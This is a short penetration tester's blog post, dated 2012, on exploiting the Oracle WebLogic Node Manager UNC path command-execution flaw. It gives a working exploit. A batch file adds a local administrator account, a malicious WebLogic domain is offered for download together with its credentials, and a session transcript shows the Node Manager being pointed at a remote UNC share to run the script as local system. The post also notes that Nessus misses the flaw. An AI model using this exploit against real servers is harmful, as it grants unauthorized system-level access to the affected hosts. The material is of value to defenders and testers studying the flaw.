Oracle Web Logic Node Manager UNC Path Remote File Execution

`Oracle Web Logic Node Manager UNC Path Remote File Execution  
Posted by admin on 2012/03/16 Leave a comment (0) Go to comments  
  
Keep running into old Web Logic installations which have the file traversal (http://www.securityfocus.com/bid/37926/info) and UNC path remote command execution (http://www.kb.cert.org/vuls/id/924300) vulns in them.  
  
The file traversal one is rubbish as you can’t specify any command line arguments AFAIK (Do tell me if I’m wrong, please).  
  
The UNC one requires you have a web logic domain accessible via a UNC path. Too much of a pain in the arse to do in middle of a test. Could not find one online, so I downloaded an older version of web logic, and setup a little wl domain with a little batch file to run the following…  
  
@ECHO OFF  
  
net user /add wlcetest WLCETest99*  
net localgroup administrators /add wlcetest  
  
The username and password for the wl domain is weblogic / w3bl0g1c.  
  
Download it here. It’s for 10.3.2, no idea if it’ll work on other versions of WebLogic.  
  
Here it is in action..  
  
user@host:~$ openssl s_client -connect 192.168.0.1:5556  
CONNECTED(00000003)  
<snip>  
—  
hello  
+OK Node manager v10.3 started  
domain cetest1 \\192.168.0.2\share  
+OK Current domain set to ‘cetest1′  
execscript addlocaladmin.bat  
+OK Script ‘addlocaladmin.bat’ executed  
  
Add and modify the batch scripts in bin/service_migration/ to execute any commands you like as local system.  
  
Typically, Nessus doesnt pick the UNC issue up, nor does it pick up the file traversal one if the domain directory structure is sitting on a driver letter other than C:\. This is because its file traversal technique can’t find ..\..\..\..\..\..\windows\system32\ipconfig.exe on D:\ E:\ Z:\ or whatever, which is its test case.  
  
  
`